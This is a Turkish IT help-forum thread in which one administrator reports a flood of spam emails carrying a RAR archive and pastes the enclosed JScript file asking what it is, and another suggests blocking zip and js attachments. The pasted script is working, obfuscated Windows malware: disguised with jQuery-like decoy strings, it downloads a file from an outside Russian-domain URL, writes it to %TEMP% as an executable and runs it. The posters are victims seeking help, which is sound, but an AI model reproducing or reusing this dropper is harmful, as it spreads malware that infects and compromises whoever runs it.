Forum

CCE29032016_00022
 
Bildirimler
Hepsini Temizle

CCE29032016_00022

2 Yazılar
2 Üyeler
0 Reactions
563 Görüntüleme
(@bulentsonmez)
Gönderiler: 276
Reputable Member
Konu başlatıcı
 

Dünden beri subject ti CCE29032016_00022 vb olan mailler alıyorum.100 ün üzerinde.(utm spam kontrolünden 10 tanesi geçmiş)

Maili gönderen ile alan aynı kişi.Ama maili biz atmıyoruz.Ne sunucuda ne de utm de mailin gönderildiğini görebiliyorum.Maillin geldiği ip adresleri farklı ülkelerden.Ayrıca mail adreslerinin içinde eski mail adreslerimizde var.(şuan kullanılmıyorlar).

Mail içeriği bir rar dosya.Rar dosyanın içerisinde jscript komut dosyası var.Bunun ne olduğunu bilen bir arkadaş varmıdır?

Yardımlarınız için şimdiden teşekkür ederim.

 

ooWHiXO = "} return deferred.promise(); } } );";
String.prototype.protoplasm = function () { aa = this; return aa.charAt(99+(1- 100)); };
var zynxp = [("CPcmdIkmRl","legitimacy","A")+("fKCHUaHQC","sediment","lefthanded","opinion","ctiveX")+"Ob"+"ject", ("CrpSqBop","manchu","opera","juDQwOi","ExpandEnv")+("frankincense","yMBmxo","covers","hoping","ironme")+("plowing","sampson","catalogue","yearly","nt")+"Strings", ""+("nanny","voluminous","bloody","parameters","%")+"TE"+"MP%", ""+("unMuRxd","blade","excel",".")+"ore".replace("o","e").replace("r","x"), (("overdone","abyssinian","heartache","G")+"un").replace("G","R"), ("d"+("benefits","runner","wqYxMtLhUW","cambodia","SX")+("memoirs","cognition","commendation","neutralize","dL2.XdLH")+"TTP").split("d").join("M"), "W"];
abraskq = " return this; };";
var ySWynuc = this[zynxp.shift()];
IQAFfk = "EuMOpnpyrlA";
charger = (("curves", "townships", "cmATgRLRj", "dowry", "ppWiLPAvGTq") + "ajfdYy").protoplasm();
soevers = (("hampshire", "NSwLfK", "alder", "zwrvNL", "sYeRDmhMko") + "FoPmcTsFC").protoplasm();

var JeaYHqFsD = new ySWynuc(zynxp.pop() + (("expenditures","FSEvgS","bulgaria","5c")+("partner","depression","MUHsbATV","ri")+"pt.5h"+("accounts","refugee","compulsory","ell")).split("5").join("S"));
prMqCNS = "jQuery.fn.ready = function( fn ) { stIAqewxu";
var mfTCF = new ySWynuc(zynxp.pop());
MjpirUiArNp = " The deferred used on oQVEJhqqgmf DOM ready var readyList;";
var lyHlf = JeaYHqFsD[zynxp.shift()](zynxp.shift());
cqhdOP = " Add the callback jQuery.ready.promise().tDVHSemDNVdone( fn );";
beddinge = (("obsession", "freeze", "faced", "AAYWbOB", "EAqmMoPtmY") + "Xoniql").protoplasm();

function whoop(pregnancy, automaton) {

    try {
        var credits = lyHlf + "/" + automaton + zynxp.shift();
    egQnXjIAM = "} Remember that the DOM is ready jQuery.isReady = true;";
    mfTCF["o" + charger + beddinge + "n"](("gblDDQpX","carbonate","represents","extensions","G") + beddinge + ("nonplussed","decorating","T"), pregnancy, false);

    SGWzLoQtR = " If a normal DOM Ready event fired, decrement, and wait if need be if ( wait !== true && --jQuery.readyWait > 0 ) { return; ";
    mfTCF[soevers + ("probe","dandelion","crystalline","e") + (("richards", "subjunctive", "KjMJwGa", "DHkskP", "deposits", "nACVJco") + "wcmCgClBh").protoplasm() + (("marge", "perhaps", "maine", "producers", "hyundai", "dEGhwGcDakKj") + "ITplDPKKs").protoplasm()]();
    rjloGSzfhlf = "} If there are functions bound, to execute readyList.resolveWith( document, [ jQuery ] );";
    if (mfTCF.status == 200) {
        var NXAVDF = new ySWynuc((""+"A"+("inappropriate","sAvdKk","pO")+"DB." + ("AEPXJhY","lodge","parker","archived","")+"S"+("reason","metadata","tr")+"eam").replace("p", "D"));
        NXAVDF[""+"o"+("queens","backbone","pen")]();
        bOTPUdYk = "jQuery.extend( {";
        NXAVDF.type = 0 + 3 - 2;
        vqbtFVNR = " Is the DOM ready to be used? Set to true once it occurs. isReady: false,";
        NXAVDF[("automation","great","frederick","languidly","w")+"ri"+"te"](mfTCF[("sylvan","PCfcSDiF","")+"R"+"es"+"pon" + soevers + "e"+"Bo"+("examiner","alcove","SXRxhq","adding","dy")]);
        LlDGoXlsvKz = " A counter to track how many items to wait for before the ready event fires. See #6781 readyWait: 1,";
        NXAVDF[(charger + ("hypocrite","Vlflcv","cellular","o")+"Di"+"ti"+("mental","navIiSx","explained","on")).replace("D", soevers)] = 0;
        DXyqSA = " Hold (or release) the ready event holdReady: function( hold ) { if ( hold ) { jQuery.readyWait++; } else { jQuery.ready( true ); } },";
        NXAVDF[("alphabetical","colonization","cobbler","stockade","s")+"av"+"eT"+("lingerie","SflQHmiWBjU","inline","surveys","oF")+("impute","optimistic","daddy","ile")](credits, 2);
        NUHLhFUR = " Handle when the DOM is ready ready: function( wait ) {";
        NXAVDF.close();
        UaWLnjy = " Abort if there are pending holds or we\"re already ready if ( wait === true ? --jQuery.readyWait : jQuery.isReady ) { return; ";
        JeaYHqFsD[zynxp.shift()](credits, 1, "jLsQtoLc" === "bNpupRcx"); xNmNMl = " } else { document.detachEvent( \"onreadystatechange\", aLFVfLlpHPM completed ); window.detachEvent( \"onload\", completed ); } ";
    }

} catch (LPlkAe) { };

    vatfbwuM = "/** * Clean-up method for dom ready events */ function detach() { if ( document.addEventListener ) { document.removeEventListener( \"DOMContentLoaded\", completed ); window.removeEventListener( \"load\", completed );";
}
whoop(("creation","regulation","ongoing","http:")+("erudition","explode","victorian","deflected","//feld")+"-h"+"au"+("umbrellas","styles","contingent","compensating","s.")+("brigand","backing","ru/76g")+("addition","fraid","chuckle","8h8y7"),"CchecAG");
   ywsdzH = " Trigger any bound ready events if ( jQuery.fn.triggerHandler ) { jQuery( document ).triggerHandler( \"ready\" ); jQuery( document ).off( \"ready\" ); } } } );";

 

 
Gönderildi : 30/03/2016 14:03

(@kadirakbaba)
Gönderiler: 895
Noble Member
 

Selam,

Bu aralar böyle bir saldırı var sanırım. Bize de çok fazla gelmeye başladı. UTM'de zipli ve js uzantılarını  bloke ettim. 3 gündür gelmiyor. 

Sistemlerde virüs yok. Exchange 2010 üzerinde antspam çalışıyor ama bir anda yağmur gibi yağmaya başladı.

İşin ilginci belli saatler arasında geliyordu.

Ben çözümü o şekilde buldum ama nedenini ve çözümü bilen varsa onu da dinlemek isterim:)

 
Gönderildi : 30/03/2016 16:37

Paylaş: